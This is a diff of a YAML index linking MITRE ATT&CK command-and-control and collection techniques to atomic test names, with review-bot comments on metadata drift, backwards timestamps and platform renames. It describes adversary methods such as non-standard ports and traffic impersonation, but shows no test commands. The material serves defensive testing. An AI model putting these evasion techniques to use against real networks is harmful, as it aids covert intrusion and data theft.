+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -77282,20 +77762,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
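Review bot: this hunk is a pure key reorder: `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` are removed after `x_mitre_platforms` and re-added before it with identical values. If the file is generated, emitting keys in a stable (for example sorted) order would stop regenerations from producing noise like this, which makes the real changes in the patch, the `modified` timestamps and reference updates, harder to spot in review.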
@@ -77320,17 +77800,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
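Review bot: the `change_rdp_port_conti` reference changes both its host (`twitter.com` to `x.com`) and its retrieval date (`March 1, 2022` to `September 12, 2024`), and `x_mitre_attack_spec_version` moves from 3.1.0 to 3.2.0, while other techniques in this same patch stay at 3.1.0 (T1090.004 and T1132, for example). Confirm these values are copied from the upstream ATT&CK object for T1571 rather than bumped by hand, and that the `x.com` URL still resolves to the same post.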
@@ -77440,7 +77919,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests:
- name: OpenSSL C2
@@ -77504,7 +77982,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
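Review bot: `modified` for Bidirectional Communication moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-26T23:15:47.861Z`. A regenerated timestamp older than the one it replaces usually means the generator read a stale or different upstream source. The same backwards move appears for Non-Standard Encoding, Data Obfuscation via Steganography, Fallback Channels, Dead Drop Resolver, Archive via Custom Method and Local Email Collection in this patch, so please state which ATT&CK release these objects were pulled from before merging.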
@@ -77541,8 +78019,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
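Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, leaving the object with no spec-version field at all, whereas objects refreshed from current upstream in this patch gain `x_mitre_attack_spec_version: 3.2.0`. If the field is absent because this object was not refreshed, refresh it too; if it is absent on purpose, any tooling that keys on the field needs to tolerate its absence. The same removal happens in the Non-Standard Encoding, Data Obfuscation via Steganography, Fallback Channels, Dead Drop Resolver, Archive via Custom Method and Local Email Collection hunks.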
@@ -77596,7 +78072,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -77668,7 +78143,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests:
- name: ICMP C2
@@ -77756,28 +78230,8 @@ command-and-control:
name: powershell
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
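Review bot: the technique is renamed from `Protocol Impersonation` to `Protocol or Service Impersonation`, and its `x_mitre_version` goes from '1.0' to '2.0'. Technique names are copied into the index CSVs and markdown indexes generated from this file, so those artifacts need regenerating in the same change; a repository-wide grep for the old name before merging would confirm nothing still carries it.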
@@ -77785,23 +78239,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
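Review bot: the new `Malleable-C2-U42` reference lists its authors as one run of names with no separators (`Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia Siddhart Shibiraj`). That string comes from upstream and should not be hand-edited here, but it is worth reporting upstream rather than propagating into every generated index. Otherwise the hunk is consistent: the expanded description (HTTP headers, URI endpoints, SSL certificates and traffic mimicking Gmail, Google Drive and Yahoo Messenger) is backed by the two new citations, and `University of Birmingham C2` is retained so the citation in `x_mitre_detection` still resolves.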
@@ -77848,7 +78340,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -77908,7 +78399,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -77940,7 +78430,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -77966,8 +78456,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -78034,7 +78522,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Powershell
@@ -78209,7 +78696,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests:
- name: rsync remote file copy (push)
@@ -79598,7 +80084,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -79622,7 +80107,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -79645,8 +80130,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests:
- name: Steganographic Tarball Embedding
@@ -79847,7 +80330,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -79867,8 +80350,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -79922,7 +80403,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -80058,7 +80538,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -80084,8 +80564,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -80139,7 +80617,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -80215,7 +80692,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests:
- name: Compress Data for Exfiltration With Rar
@@ -80724,7 +81200,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests:
- name: Screencapture
@@ -81067,7 +81542,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.001:
technique:
@@ -81146,7 +81620,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests:
- name: Input Capture
@@ -81465,7 +81938,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -81480,30 +81953,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -81512,13 +81965,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
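Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here between `kill_chain_phases` and `x_mitre_contributors`, whereas the other fully regenerated objects in this patch (Protocol or Service Impersonation, Data from Removable Media, Local Data Staging) place it after `object_marking_refs`. Harmless as YAML, but it shows the generator does not emit a consistent layout, which is what makes these diffs so large. The description change itself, linking `Testing / development credentials` to T1552, is a straightforward upstream refresh.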
@@ -81532,20 +81989,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
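Review bot: the Sharepoint platform list changes from `Office 365` to `Office Suite` and the object gains the `Cloud Service: Cloud Service Metadata` data source. Platform names drive the per-platform index files, so an index keyed on the old `Office 365` name will silently lose this technique (Email Collection and Data from Cloud Storage Object receive the same rename in this patch) unless those indexes are regenerated from this file in the same change.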
@@ -81588,7 +82062,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests:
- name: using device audio capture commandlet
@@ -81670,7 +82143,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -81690,22 +82163,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -81722,11 +82197,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
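Review bot: both `Google Workspace` and `Office 365` are dropped from Email Collection's platforms and replaced by the single `Office Suite` entry. Any Google Workspace specific index or platform-keyed test mapping that listed T1114 will no longer match after this change; please confirm the platform index CSVs were regenerated from this file rather than edited independently, otherwise they will drift from it.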
@@ -81742,37 +82216,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
@@ -81784,22 +82249,41 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests:
- name: Identify Documents on USB and Removable Media via PowerShell
@@ -81826,55 +82310,54 @@ collection:
'
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
